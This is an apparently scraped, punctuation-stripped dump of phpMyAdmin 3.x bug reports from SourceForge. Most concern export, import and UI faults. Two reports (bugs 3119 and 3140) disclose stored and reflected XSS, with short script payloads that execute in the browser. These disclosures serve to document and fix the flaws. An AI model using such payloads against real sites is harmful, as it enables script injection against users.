apache php lib php apache htdocs webdev its lib ) in apache htdocs hotel phpMyAdmin 3.3.1 all languages libraries PHPExcel PHPExcel Shared JAMA Matrix.php on line 9 It appears that the directory libraries PHPExcel must be in the PHP include path, e.g.
php admin value include path .
apache php lib php apache htdocs webdev its lib apache htdocs hotel phpmyadmin libraries PHPExcel This was not needed in 3.3.0.
Something changed?
Original URL https sourceforge.net p phpmyadmin bugs 3003 Original author bwiberg Found in version 3.3.1","bug"
"24444","9373","OK 3.3.3) Excel 97 2003 export omits data.
As of 3.3.1 3.3.0 worked fine) Excel 97 2003 XLS Workbook exports of a table rum.sql) yields an incorrect XLS file rum.xls) where most of the data appears to be missing.
Viewing using OpenOffice oocalc yields only the first two rows of data.
Using MS Excel 2003, it says that the file is broken and offers to repair it.
However, most of the text data is missing after the repair.
Other export formats ODS, CSV) work just fine.
Attaching the SQL dump and the XLS export file.
Original URL https sourceforge.net p phpmyadmin bugs 3007 Original author bwiberg Found in version 3.3.1","bug"
"24444","9374","OK 3.3.3) Excel 97 2003 import yields SQL errors.
As of 3.3.1, Excel 97 2003 XLS Workbook imports seem to be broken.
Attaching SQL table structure personaccess.sql) and XLS file to import Personaccess import.xls).
Import yields the error message Fel SQL frxc3xa5ga CREATE TABLE IF NOT EXISTS `linademodb`.
`A` int 1 ) , `B` int 3 ) ) ENGINE = MYISAM ; MySQL sa 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near `A` int 1), `B` int 3)) ENGINE=MyISAM at line 1 Notice how the table name has been omitted in CREATE TABLE IF NOT EXISTS `linademodb`.
...even though the table in question has been selected prior to clicking the Import tab.
Original URL https sourceforge.net p phpmyadmin bugs 3008 Original author bwiberg Found in version 3.3.1","bug"
"24444","9375","Data too long for column data sql .
When using SQL option under PMA version 3.3.0 and 3.3.1, I get this error when doing the query Error SQL query NOTRACK UPDATE `phpmyadmin`.`pma tracking` SET `data sql` = CONCAT `data sql` , log 2010 03 23 18 40 50 MainUser DELETE FROM `Variables` WHERE Folder= WebYajaira SiteMiscellanea AND Type= Pantalla AND Name= PhotoCommentStart.php ; ) , `date updated` = 2010 03 23 18 40 50 WHERE FIND IN SET DELETE , tracking ) gt;0 AND `db name` = basic data AND `table name` = Variables AND `version` = 1 MySQL said 1406 Data too long for column data sql at row 1 If I use the IMPORT option, the problem does NOT arise.
If I use the SQL option under version 2.9.11.3, the problem LOGICALLY does not occur, the tracking option was not enabled in said version If you need the table and query in use, please contact me to upload a file with the query and the table definition.
Original URL https sourceforge.net p phpmyadmin bugs 3009 Original author yacar suscri","bug"
"24444","9376","Horizontal scoll in left column MacOS, FF).
In Firefox under macosx in left navigation column are small horizontal scroll.
Original URL https sourceforge.net p phpmyadmin bugs 3010 Original author max wp Found in version 3.3.0","bug"
"24444","9377","Invalid argument foreach ) ?
header already sent ?.
I wanted to add data into a table but I am party to eat When I return I click run to insert my record and I am referring to the login page I put the password and then it bug i work with phpMyAdmin 2.11.8.1deb5 lenny3 Warning Invalid argument supplied for foreach ) in usr share phpmyadmin tbl replace.php on line 142 Warning Cannot modify header information headers already sent by output started at usr share phpmyadmin tbl replace.php 142) in usr share phpmyadmin libraries ob.lib.php on line 83 Warning Cannot modify header information headers already sent by output started at usr share phpmyadmin tbl replace.php 142) in usr share phpmyadmin libraries header http.inc.php on line 22 Warning Cannot modify header information headers already sent by output started at usr share phpmyadmin tbl replace.php 142) in usr share phpmyadmin libraries header http.inc.php on line 23 Warning Cannot modify header information headers already sent by output started at usr share phpmyadmin tbl replace.php 142) in usr share phpmyadmin libraries header http.inc.php on line 24 Warning Cannot modify header information headers already sent by output started at usr share phpmyadmin tbl replace.php 142) in usr share phpmyadmin libraries header http.inc.php on line 25 Warning Cannot modify header information headers already sent by output started at usr share phpmyadmin tbl replace.php 142) in usr share phpmyadmin libraries header http.inc.php on line 28 Serveur localhost 0 PMA sendHeaderLocation http 192.168.1.50 phpmyadmin main.php?token=fabbefb818131d7a4a2ad3aed1210735 message=Pas de modifications reload=1) called at [ usr share phpmyadmin libraries db common.inc.php 45] 1 require usr share phpmyadmin libraries db common.inc.php) called at [ usr share phpmyadmin db sql.php 16] 2 require usr share phpmyadmin db sql.php) called at [ usr share phpmyadmin tbl replace.php 283] Fatal error PMA sendHeaderLocation called when headers are already sent!
in usr share phpmyadmin libraries common.lib.php on line 660 x03xefxbfxbdxefxbfxbdxefxbfxbd xefxbfxbd x12xefxbfxbdxefxbfxbd Original URL https sourceforge.net p phpmyadmin bugs 3011 Original author eimdavid Found in version 2.11.8","bug"
"24444","9378","Wrong running time..
Looking at the status tab, I am getting the following This MySQL server has been running for 49710 days, 6 hours, 18 minutes and 33 seconds.
It started up on Mar 31, 2010 at 09 46 AM.
.
This is would be true if today was May 7th 2146!
Original URL https sourceforge.net p phpmyadmin bugs 3012 Original author anonymous Found in version 3.2.5","bug"
"24444","9379","Wrong type of Uptime since flush status.
In Status tab the variabel Uptime since flush status show a value and not the time since flushed.
Original URL https sourceforge.net p phpmyadmin bugs 3013 Original author tunis78 Found in version 3.3.1","bug"
"24444","9380","Sync S D only S. If a table is not in the target db and I ask to synchronize Structure and Data, only Structure is done.
Then I come back and ask for D and it works.
Original URL https sourceforge.net p phpmyadmin bugs 3014 Original author lem9 Found in version 3.3.2","bug"
"24444","9381","PBXT storage overview emits warning.
Notice in .
libraries common.lib.php 1438 A non well formed numeric value encountered Backtrace .
libraries common.lib.php 1438 number format string 1MB, integer 0, ) .
libraries common.lib.php 1399 PMA formatNumber string 1MB, integer 0, ) .
libraries StorageEngine.class.php 181 PMA formatByteDown string 1MB) .
server engines.php 142 PMA StorageEngine gt;getHtmlVariables ) Can be seen on MariaDB demo server http demo.phpmyadmin.net trunk config server engines.php?engine=PBXT server=2 Original URL https sourceforge.net p phpmyadmin bugs 3016 Original author nijel","bug"
"24444","9382","Designer has wrong expand state on load.
When opening up a designer, all tables look like expanded, but in fact are collapsed, so it takes two clicks to actually expand them first one just changes the icon, while second one does the expadning).
Afterwards expading works as expected, so just the initial state is wrong.
Original URL https sourceforge.net p phpmyadmin bugs 3018 Original author nijel","bug"
"24444","9383","Changing table engine emits warning.
When changing from MyISAM to Maria storage engine, I got following warnings Notice in .
tbl operations.php 120 Undefined variable transactional Backtrace Notice in .
tbl operations.php 126 Undefined variable page checksum Backtrace Original URL https sourceforge.net p phpmyadmin bugs 3019 Original author nijel","bug"
"24444","9384","Changing from Maria to MyISAM not possible.
It is not possible to change from Maria to MyISAM storage engines, MySQL fails with following error Error 1478 Table storage engine MyISAM does not support the create option TRANSACTIONAL=1 I guess that table operations should have checkbox for TRANSACTIONAL or automatically disable it when switching to MyISAM.
Original URL https sourceforge.net p phpmyadmin bugs 3020 Original author nijel","bug"
"24444","9385","Flush table on table operations shows the query...
When clicking on flush table link on table operations, the SQL is displayed twice.
I m not sure if it is also executed twice, it should be verified.
Original URL https sourceforge.net p phpmyadmin bugs 3021 Original author nijel","bug"
"24444","9386","default export settings not showing.
if you set the config to default export settings the options dont show.
eg in config.inc.php cfg[ Export ][ format ] = xls ; cfg[ Export ][ xls columns ] = true; cfg[ Export ][ xls null ] = ; cfg[ Export ][ xls edition ] = win ; Original URL https sourceforge.net p phpmyadmin bugs 3022 Original author r si Found in version 3.3.2","bug"
"24444","9387","Missing EOL.
Hello ; I m ispCP developper and as maybe you already know, we have integrated PMA as part of our software package.
Today, I ve checked all the files of our package to fix the missing EOL at end of files and also, to converts all EOL in the Unix format.
The result for PMA latest stable version) is like this nuxwin dev Desktop Workspace trunk contrib perl ispcp eol.pl s v l Fixed CRLF|CR to LF in .
gui tools pma documentation gsoc Synchronization User Manual.htm Fixed CRLF|CR to LF in .
gui tools pma js mooRainbow mooRainbow.css Fixed CRLF|CR to LF in .
gui tools pma libraries PHPExcel PHPExcel Reader Excel5.php Fixed CRLF|CR to LF in .
gui tools pma robots.txt Fixed CRLF|CR to LF in .
gui tools pma setup scripts.js Fixed CRLF|CR to LF in .
gui tools pma setup styles.css Fixed CRLF|CR to LF in .
gui tools pma themes modern css theme left.css.php Fixed CRLF|CR to LF in .
gui tools pma themes modern css theme right.css.php Fixed CRLF|CR to LF in .
gui tools pma themes modern info.inc.php Fixed CRLF|CR to LF in .
gui tools pma themes modern layout.inc.php Fixed CRLF|CR to LF in .
gui tools pma themes omega css theme print.css.php Fixed missing EOL in .
gui tools pma config.inc.php Fixed missing EOL in .
gui tools pma js mooRainbow mooRainbow.css Fixed missing EOL in .
gui tools pma js navigation.js Fixed missing EOL in .
gui tools pma libraries PHPExcel PHPExcel Shared trend exponentialBestFitClass.php Fixed missing EOL in .
gui tools pma libraries PHPExcel PHPExcel Shared trend linearBestFitClass.php Fixed missing EOL in .
gui tools pma libraries PHPExcel PHPExcel Shared trend logarithmicBestFitClass.php Fixed missing EOL in .
gui tools pma libraries PHPExcel PHPExcel Shared trend polynomialBestFitClass.php Fixed missing EOL in .
gui tools pma libraries PHPExcel PHPExcel Shared trend powerBestFitClass.php Fixed missing EOL in .
gui tools pma libraries PHPExcel PHPExcel Shared trend trendClass.php Fixed missing EOL in .
gui tools pma libraries session.inc.php Fixed missing EOL in .
gui tools pma libraries tcpdf unicode data.php Fixed missing EOL in .
gui tools pma pmd scripts ajax.js Fixed missing EOL in .
gui tools pma pmd styles default style1.css Fixed missing EOL in .
gui tools pma print.css Fixed missing EOL in .
gui tools pma robots.txt Fixed missing EOL in .
gui tools pma setup lib FormDisplay.tpl.php Fixed missing EOL in .
gui tools pma setup lib form processing.lib.php Fixed missing EOL in .
gui tools pma setup lib validate.lib.php Fixed missing EOL in .
gui tools pma themes omega css theme right.css.php What about this issue ?
You can fix it or not ?
In my opinion, the missing EOL should be fixed.
Thank for your answer here.
Original URL https sourceforge.net p phpmyadmin bugs 3023 Original author nuxwin Found in version 3.1.1","bug"
"24444","9388","phpMyAdmin cuts Extra entries at the first occurrence of ;.
When I enter my explain SELECT statement at a mysql shell I get the following output | id | select type | table | type | possible keys | key | key len | ref | rows | Extra | | 1 | PRIMARY | main | ref | idx1 | idx1 | 52 | const,const | 1 | Using where; Using temporary; Using filesort | Notice the multiple entries in the Extra column.
This is what I get when I enter the same statement in phpMyAdmin 3.3.5 http www.image upload.net images wp8revfnn09x8egy873.png Original URL https sourceforge.net p phpmyadmin bugs 3110 Original author anonymous","bug"
"24444","9389","not all data being shown counted.
ok no idea when this was introduced but if i run an sql statement with a fixed number in the first column, then i only get the first 30 rows as expected) but it also tells me that there are only 30 rows in total when there should be over 4500.
This means that if i then run the SQL with SUM ) on fields there data totals are incorrect.
runs incorrectly SELECT 95 stock id, Carriage stock model, IF kpim.eod period = 2010 03 , kpim.carrier net, 0 ) 03 carriage FROM bob outbound kpi master kpim WHERE kpim.eod period = 2010 03 runs fine SELECT 95 stock id, Carriage stock model, IF kpim.eod period = 2010 03 , kpim.carrier net, 0 ) 03 carriage FROM bob outbound kpi master kpim WHERE kpim.eod period = 2010 03 Original URL https sourceforge.net p phpmyadmin bugs 3024 Original author r si Found in version 3.3.3","bug"
"24444","9390","Results for query are not displayed.
In case of multi statement query, result of last command is not shown when here is a comment after it.
For example following does not work SELECT FROM `actor` WHERE 1; SELECT `actor id`, `first name`, `last name`, `last update` FROM `actor` WHERE 1; foo While this works as expected SELECT FROM `actor` WHERE 1; SELECT `actor id`, `first name`, `last name`, `last update` FROM `actor` WHERE 1; Original URL https sourceforge.net p phpmyadmin bugs 3025 Original author nijel Found in version 3.3.3","bug"
"24444","9391","Text not shown for icons after creating table.
When creating new table using AJAX, the list of tables on database page is updated, however the newly created rows lack textual descriptions as they should have based on cfg[ PropertiesIconic ] Original URL https sourceforge.net p phpmyadmin bugs 3115 Original author nijel Found in version Latest Git","bug"
"24444","9392","not all data being shown counted.
ok no idea when this was introduced but if i run an sql statement with a fixed number in the first column, then i only get the first 30 rows as expected) but it also tells me that there are only 30 rows in total when there should be over 4500.
This means that if i then run the SQL with SUM ) on fields there data totals are incorrect.
runs incorrectly SELECT 95 stock id, Carriage stock model, IF kpim.eod period = 2010 03 , kpim.carrier net, 0 ) 03 carriage FROM bob outbound kpi master kpim WHERE kpim.eod period = 2010 03 runs fine SELECT 95 stock id, Carriage stock model, IF kpim.eod period = 2010 03 , kpim.carrier net, 0 ) 03 carriage FROM bob outbound kpi master kpim WHERE kpim.eod period = 2010 03 Original URL https sourceforge.net p phpmyadmin bugs 3026 Original author r si","bug"
"24444","9393","ascii bin is recognized as a binary field.
Whenever I set a varchar field to ascii bin it is recognized as a binary field and thus displayed in hex characters.
Now for true binary fields this is a useful feature but I don t think fields using a collate of the bin variant should be recognized as binary fields.
As far as I know this simply means that you wish to use case sensitive string matching which is very useful from time to time.
However the contents of the field is still character encoded thus it isn t a binary field in the sense that it contains raw bytes.
I hope this can be fixed so that only binary, varbinary and the blob variants are recognized as binary fields and char, varchar and the text variants will be recognized as text fields independent of the collate setting.
Original URL https sourceforge.net p phpmyadmin bugs 3027 Original author davekok","bug"
"24444","9394","pma relation.
the bug NOT VIW foreigin key relation, old version view relation the passoword server is U root P root in config use in myprivate localhost) Original URL https sourceforge.net p phpmyadmin bugs 3028 Original author gufo rosso","bug"
"24444","9395","Link Mime transformation output isn t escaped.
Insert a row with a value of lt;script gt;while 1==1)\{console.log lol );\} lt; script gt; .
Set the MIME transformation of that field to HTML.
That JS will now be executed.
Works with any HTML JS, as it s not being escaped at all.
Perhaps it can be said that values here should be run through htmlspecialchars first, but my instinct is to only escape on output.
Have tested on 2.11.11, which this still exists.
Original URL https sourceforge.net p phpmyadmin bugs 3119 Original author ss23","bug"
"24444","9396","Page number 0 for relational schema in pdf report.
When creating a pdf report including relational schema, the page which shows the relations and is located at the end of the report is given a 00 page number in the table of contents.
Is there a way to change this?
Attached is a screenshot of the table of contents.
Original URL https sourceforge.net p phpmyadmin bugs 3029 Original author michelegaroche Found in version 3.3.2","bug"
"24444","9397","Selection multiple and edition.
Hi When i want to edit few rows in the same time, i check some checkbox and click on the pencil.
Sometimes, phpMyAfmin says to me Aucune ligne n a xc3xa9txc3xa9 sxc3xa9lectionnxc3xa9e in French Strange !!!!
Sometimes I can edit my rows, but when I want to save , only the first dans the second line are save !!!!
Borring !!!!
I do the same thing with some old version without any problem.
regards, JFL Original URL https sourceforge.net p phpmyadmin bugs 3121 Original author anonymous Found in version 3.3.7","bug"
"24444","9398","Browse tab not selectable for empty tables.
When clicking through a DBs list of tables to the right, the default action is to browse the values.
I have some tables that don t have any entries.
It s very disturbing to get to the Browse tab for non empty and get to the Structure tab for non empty tables!
Just not great usability.
Why isn t just some message shown no rows ?
Original URL https sourceforge.net p phpmyadmin bugs 3030 Original author kwutzke2 Found in version 3.2.3","bug"
"24444","9399","phpMyAdmin doesn t work with PHP 5.3.3.
Hello!
I tried to install phpMyAdmin with Apache 2.2 and PHP 5.3.3, but the following error occured When I try to log in on the index.php page, after pressing Go, I eventually only get a HTTP 500 error internal server error) after some time.
Sometimes even the index.php page doesn t show.
Then I installed PHP from the 5.2 branch, version 5.2.14, and phpMyAdmin works flawlessly.
So it seems that phpMyAdmin is incompatible with PHP 5.3.3!
Greetings, Matthias Bxc3xb6hm Original URL https sourceforge.net p phpmyadmin bugs 3122 Original author ma boehm","bug"
"24444","9400","Placement of AUTO INCREMENT.
AUTO INCREMENT is displayed in the Extra section of a table s Structure tab.
Why is it not in the Default column?
AUTO INCREMENT like standard SQL IDENTITY) cannot be specified along with the DEFAULT keyword anyway and should not).
Both don t make any sense together anyway.
AUTO INCREMENT clearly is a default when nothing else is specified.
It should be in the Default column, though this might be new for many.
It clearly belongs there.
If you don t change this, UPPER CASE auto increment in the current implementation please.
Original URL https sourceforge.net p phpmyadmin bugs 3031 Original author kwutzke2 Found in version 3.2.3","bug"
"24444","9401","XLS Import Limit.
XLS import works fine until you hit the 27th column.
Exporting XLS from tables longer than 26 columns works fine.
I ve looked at PHPExcel but other that getting maximum column Im stuck.
Original URL https sourceforge.net p phpmyadmin bugs 3032 Original author rmostell17","bug"
"24444","9402","import value is not properly escaped.
When the contents of a Cell in an Excelsheet, or a value in a CSV file, contains a \, it is not properly escaped during import.
This might end up with the \ disappearing being replaced by the escape sequence it forms), or an error when it breaks the SQL statement f.e.
when the \ is the last character of a string) Original URL https sourceforge.net p phpmyadmin bugs 3033 Original author ruleant Found in version Latest Git","bug"
"24444","9403","Import fails with 1100 error.
During importing of dump file attached) to empty DB, I get the following message Error SQL query SELECT `comment` FROM `phpmyadmin`.`pma column info` WHERE db name = arcadius AND table name = AND column name = db comment) MySQL said 1100 Table pma column info was not locked with LOCK TABLES .. and import fails.
After commenting pmadb things in config.inc.php re login to phpMyAdmin, the error disappears.
Original URL https sourceforge.net p phpmyadmin bugs 3034 Original author fedushin","bug"
"24444","9404","duplicate column names lost.
I know its my own fault for having this and its dead easy for a work around but just to let you know if you have duplucate names then the second set of columns is lost.
it only happens in a recent release though.
eg SELECT col1 qtr1, col2 qtr2, col3 qtr3, col4 qtr4, SUM ) tot 2009, col5 qtr1, col6 qtr2, col7 qtr3, col8 qtr4, SUM ) tot 2010 you only get qtr1, qtr2, qtr3, qtr4, tot 2009, tot 2010 Original URL https sourceforge.net p phpmyadmin bugs 3035 Original author r si Found in version 3.3.2","bug"
"24444","9405","Import button doesn t work in catalan.
I installed the phpmyadmin in catalan language, but when I tried to import a sql the submit button doesn t work correctly.
The javascript console dhow this error missing ) after argument list line 88 upload form status info ).set html , lt;img src= .
themes original img ajax clock small.gif alt= ajax clock gt; Per favor, sigues pacient, l arxiu s estxc3xa0 carregant.
Els detalls de la cxc3xa0rrega no estxc3xa0n disponibles.
lt;a href= Documentation.html faq2 9 target= documentation gt; lt;img class= icon src= .
themes original img b help.png width= 11 height= 11 alt= Documentacixc3xb3 title= Documentacixc3xb3 gt; lt; a gt; ); Probably the string it s not escape.
Thanks Original URL https sourceforge.net p phpmyadmin bugs 3036 Original author chefuri","bug"
"24444","9406","Problem file SQL script bug import).
Hello, sorry for the comprehension but I don t speack English very well...
So, I have find a problem in the import of phpMyAdmin with an .sql file but with a manual script SQL, they have no problem...
This is my files CREATE TABLE `carbu`.`modules` `module id` INT NOT NULL AUTO INCREMENT PRIMARY KEY , `module name` VARCHAR 40 ) NOT NULL , UNIQUE `module name` ) ) ENGINE = MYISAM CHARACTER SET latin1 COLLATE latin1 general ci; INSERT INTO modules module id ,module name) VALUES , Stations service ), , Services ), , Marques ); So, I have a problem with the INSERT when I insert this file with the import file but I have no problem with a copy past in a SQl script.
Make the test... =) and the problem is in the INSERT, the for the auto increment have a problem...
Thank you Original URL https sourceforge.net p phpmyadmin bugs 3037 Original author shark59 Found in version 3.2.5","bug"
"24444","9407","Export view as sql gives no rows.
Been trying to export a View as SQL, as it produces no data.
Tried changing to all rows , but still produces no export.
Works ok with CSV Original URL https sourceforge.net p phpmyadmin bugs 3038 Original author iasgoscouk Found in version 3.3.2","bug"
"24444","9408","synchronize feature default port value nonfunctional.
The synchronize feature automatically fills in the Port field with the default MySQL port of 3306.
Proceeding with this value results in an error connecting to the source and or target database.
For the synchronize to succeed when the default MySQL port is in use, the Port field must be left blank.
Original URL https sourceforge.net p phpmyadmin bugs 3039 Original author skeledorkus Found in version 3.3.3","bug"
"24444","9409","Designer export can be confusing.
Currently on designer export import to PDF, there is a dialog for creating a new page.
I would expect it to create new PDF page and export the schema to it.
However it only creates new page.
I really don t see need for separate creating of new page, it should also export current schema there as well.
Original URL https sourceforge.net p phpmyadmin bugs 3133 Original author nijel","bug"
"24444","9410","switching databases from more than 250 tables to less than.
phpMyAdmin 2.11.8 php5 debian apt get install If you have more than 250 tables, phpMyAdmin breaks the table navigation into pages .
If you are on a page of tables higher than one and switch to a database with less pages of tables, you will get a No tables found in database message.
If you switch back to the database with the higher number of pages of tables and change the page number within range of the other database s number of tables, you can now see your tables for the database with less tables when switching to that database.
It seems phpMyAdmin is remember what page of tables you are on when switching databases.
Perhaps this data should be cleared or a check put in place to see if the database you are switching in to has enough tables to meet the page of tables you are on.
Original URL https sourceforge.net p phpmyadmin bugs 3041 Original author mbuteyn","bug"
"24444","9411","[BLOB 2B] CONVERT CAST required for GROUP BY functions.
The alike of my problem is described here QUESTION PROBLEM http forums.mysql.com read.php?20,293083,293203 msg 293203 ANSWER SOLUTION http forums.mysql.com read.php?20,293083,293232 msg 293232 The problem still persists in PMA 3.3.2 Original URL https sourceforge.net p phpmyadmin bugs 3042 Original author shehriyari Found in version 3.3.2","bug"
"24444","9412","Last dropped database remains active in navi.
When dropping database s) from server databases.php the last dropped one gets activated in left frame.
Original URL https sourceforge.net p phpmyadmin bugs 3043 Original author nijel","bug"
"24444","9413","Edit link missing after long query.
In 3.2.x and 3.3.3 if you enter a short query there is a bar below with the following options [ Edit ] [ Explain SQL ] [ Create PHP Code ] [ Refresh ] If you enter a long query, scrollbars are used to allow the query to scroll though after a certain point it still gets truncated with ...).
The bar mentioned above no longer appears.
It s then necessary to open the query window using the icon at the top left and copy and paste your query if history is not enabled.
As mentioned above, at a certain point the query gets truncated making cut and paste impossible too.
I m not sure if there is, perhaps, just a CSS issue hiding those links.
I ve tested on Firefox3.6.3 and Chrome 5.0.375.55 both have the same issue.
Original URL https sourceforge.net p phpmyadmin bugs 3044 Original author albanach Found in version 3.3.3","bug"
"24444","9414","PMA getRelationsParam relation.lib.php session bug).
phpmyAdmin 3.2.0.1 MySQL 5.1.36 run on Vista Apache 2.2.11 check bug comment below function PMA getRelationsParam verbose = false) \{ BUG this session variable check doesn t update after ruining once so even if you set up all config params correct they are still reported as not working in this case SESSION[ relation .
GLOBALS[ server ]] is a array with some fields but no values one of solution is to skip this check but i don t know if it doesn t have any other important meaning if empty SESSION[ relation .
GLOBALS[ server ]])) \{ SESSION[ relation .
GLOBALS[ server ]] = PMA getRelationsParam ); \} if verbose) \{ PMA printRelationsParamDiagnostic SESSION[ relation .
GLOBALS[ server ]]); \} just for BC GLOBALS[ cfgRelation ] = SESSION[ relation .
GLOBALS[ server ]]; return SESSION[ relation .
GLOBALS[ server ]]; \} Original URL https sourceforge.net p phpmyadmin bugs 3045 Original author xesenix","bug"
"24444","9415","Tracking MySQL interactive timeout yields error.
If the MySQL server has interactive timeout set, e.g.
to 60 seconds, and one exports a large table and has tracking enabled cfg[ Servers ][ i][ tracking ] set to a non empty value), one gets an error message after a little while Fel SQL frxc3xa5ga Dokumentationxc3x84ndra xc3x84ndra SELECT tracking active FROM `pmadb`.`pma tracking` WHERE `db name` = linadb AND `table name` = Uttag Export ORDER BY version DESC MySQL sa Dokumentation 2006 MySQL server has gone away This is because the interactive timeout has kicked in and closed the connection and phpMyAdmin expects it to be open.
Recall that the default timeout in MySQL is 5 minutes so depending on the size of the table anyone could experience this.)
It would be great if phpMyAdmin would re open the connection if needed.
Or, as a work around, if there were an option to send an SQL preamble to raise the interactive timeout prior to the query, e.g.
SET SESSION interactive timeout=600, SESSION wait timeout=600; ...replacing 600 with ExecTimeLimit seconds from the configuration instead.
Original URL https sourceforge.net p phpmyadmin bugs 3046 Original author bwiberg Found in version 3.5.5","bug"
"24444","9416","ssl not working with mysqli.
cfg[ Servers ][ i][ ssl ] = true does not work when cfg[ Servers ][ i][ extension ] = mysqli , but does work when cfg[ Servers ][ i][ extension ] = mysql ; the message returned in the web interface says 1045 Cannot log in to the MySQL server .
how can i troubleshoot this further?
i m using phpmyadmin 3.3.3, form source, and mysql server 5.1.41, courtesy of ubuntu.
Original URL https sourceforge.net p phpmyadmin bugs 3047 Original author bthielsen Found in version 3.3.7","bug"
"24444","9417","XSS on search.
If you search for lt; lt;script gt;alert T ); lt; script gt; gt; in the global search and get table hits) the delete button link on the result page isn t build correctly, so the JS will be executed.
Original URL https sourceforge.net p phpmyadmin bugs 3140 Original author opi Found in version 3.3.8","bug"
"24444","9418","changing database doesn t work Chrome).
in the left frame, changing database doesn t work on chrome.
clicking on the server name in the right frame, then databases works.
in the console phpMyAdmin js common.js 104 Uncaught TypeError Cannot call method getElementById of undefined Original URL https sourceforge.net p phpmyadmin bugs 3048 Original author anonymous Found in version 3.3.3","bug"
"24444","9419","Export with file option creates invalid commands.
When using the export option with the Save as file, option enabled creates some commands that when doing the import of the very same generated file does not import the spanish characters correctly.
This in an example of an export file with the Save as file option enabled .
then the table and the data details and at the end there is nothing else.
This behavior is the same using PMA, 332, 333, and the recently released 334.rc1 I use Apache 2.2.11, Php 5.3.2 and MySQL client version mysqlnd 5.0.7 dev 091210 Revision 294543 If I delete those 6 lines 3 at beginning and the 3 at end) the impor works correctly and the spanish characters are saved fine.
Original URL https sourceforge.net p phpmyadmin bugs 3049 Original author yacar suscri Found in version 3.5.5","bug"
"24444","9420","in SQL error message gets converted to entitiy.
Not sure if Displaying results is the appropriate category.
I entered a query containing a bitwise AND ) yesterday via the SQL query box.
There was some error in my SQL syntax, anyway, so I got a SQL error back.
Unfortunately, that SQL error showed the converted to amp;amp; , so my first assumption was that PHPMyAdmin was submitting the as amp;amp; .
Only later it became clear that it submitted correct and only the error contained the converted amp;amp; .
I believe the error should display as is to avoid any ambiguity.
To reproduce simply enter a in the sql query box and submit.
This will throw the following error 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near amp;amp; at line 1 The error should display as 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1 The same happens with lt; and gt; in queries.
Original URL https sourceforge.net p phpmyadmin bugs 3147 Original author kai schaetzl Found in version 3.3.7","bug"
"24444","9421","Unknown column Event priv in field list .
Used MySQL 5.1.47 Click on DB name and go to Privileges page.
If MySQL server is pre 5.1.6 we have this error Unknown column Event priv in field list .
Previous solution if PMA MYSQL INT VERSION gt;= 50106) \{ list of privileges .= , `Event priv`, .
`Trigger priv` ; list of compared privileges .= AND `Event priv` = \ N\ .
AND `Trigger priv` = \ N\ ; \} this is wrong and should be Solution server privileges.php line 2058 if PMA MYSQL INT VERSION gt;= 50160) \{ list of privileges .= , `Event priv`, .
`Trigger priv` ; list of compared privileges .= AND `Event priv` = \ N\ .
AND `Trigger priv` = \ N\ ; \} Original URL https sourceforge.net p phpmyadmin bugs 3050 Original author shaunbluff Found in version 3.3.3","bug"
"24444","9422","query for table level causes strange display.
When omitting backticks around the table name level in the sql query box the results page displays different than in case you surrounded the table name with backticks.
Example compare SELECT FROM level with SELECT FROM `level`.
The results page of the backtick query contains the default 30 results per page, a button to display everything and you can walk thru the table page by page.
The results page of the non backtick query pretends to contain the 30 default results, but actually shows all results.
There are buttons to walk thru the other pages, but this is faked as well, they actually show the same content again and again.
And the display all button is missing from the page which makes sense as it is displaying all).
I first thought it might happen in all cases where I omit backticks, but it really seems to occur only if the table name is level .
I checked the reserved words list for MySQL and level is not on it.
Original URL https sourceforge.net p phpmyadmin bugs 3151 Original author kai schaetzl Found in version 3.3.7","bug"
"24444","9423","Buttons don t work in Firefox 3.6.3.
When I click on the S and D buttons with Firefox 3.6.3 nothing happens.
The error console reports change Image not defined and showDetails not defined.
Also Error [Exception... JavaScript component does not have a method named handleEvent when calling method [nsIDOMEventListener handleEvent] nsresult 0x80570030 NS ERROR XPC JSOBJECT HAS NO FUNCTION NAMED) location lt;unknown gt; data no] Original URL https sourceforge.net p phpmyadmin bugs 3051 Original author olwenwilliams Found in version 3.3.3","bug"
"24444","9424","Can t browse a table with a reserved word as fieldname.
I have a table with a field named order if I click on the browse tab link ...
I get a blank page.
If I click on SQL tab link and just run the default query select from `mytable` where 1) it works.
If I rename the field order to orders ...
I m able to browse the table again ... seems the field name isn t correctly quoted when using the browse feature ... or ?!
Eric Original URL https sourceforge.net p phpmyadmin bugs 3052 Original author anonymous Found in version 3.3.2","bug"
"24444","9425","Import button doesn t work in catalan.
The bug is not fixed.
When I load the Import page the javascript error launch this error missing ) after argument list [Break on this error] upload form status info ).set h...s. lt;a href= Documentation.html faq2 9 line 100, db import.php removing the \ characters of the strImportUploadInfoNotAvailable in catalan utf 8.inc.php file solve the problem.
Original URL https sourceforge.net p phpmyadmin bugs 3053 Original author hastms Found in version 3.3.4","bug"
"24444","9426","No result set display from stored procedure SELECT.
phpMyAdmin Version 3.3.4 MySQL Server version 5.1.37sp1 enterprise gpl pro PHP version 5 When I set the current database to test in phpMyAdmin and click on the SQL tab and run call ShowFoo; I do not receive a display of the result set from stored procedure ShowFoo .
Previously, I had created stored procedure ShowFoo in the test database with DELIMITER CREATE PROCEDURE ShowFoo ) BEGIN SELECT foo ; END DELIMITER ; There is a work around.
When I set the database to localhost rather than test , click on the SQL tab, and run call test.ShowFoo; then I do successfully receive a display of the result set foo ).
Note that I placed test.
before ShowFoo this time.)
Surprisingly, if I set the database to test and use that same SQL, 1) I do not see the result set and 2) the current database reverts from test to localhost .
In contrast, running a command such as show tables; does not revert the current database to localhost .
As another variation, I tried using use test; before calling the stored procedure.
Running the SQL use test; call test.ShowFoo; results in the error message 2014 Commands out of sync; you can t run this command now It does not depend on whether the current database is localhost or test .
Furthermore, it does not matter whether or not test.
precedes ShowFoo .
In contrast, when I run use test; show tables; I receive the result set and do not receive an error message, so there is no problem with the use statement preceding another statement.
The problem occurs only when calling a stored procedure.
Original URL https sourceforge.net p phpmyadmin bugs 3054 Original author anonymous Found in version 3.3.4","bug"
"24444","9427","references to table name doesn t respect case sensitive.
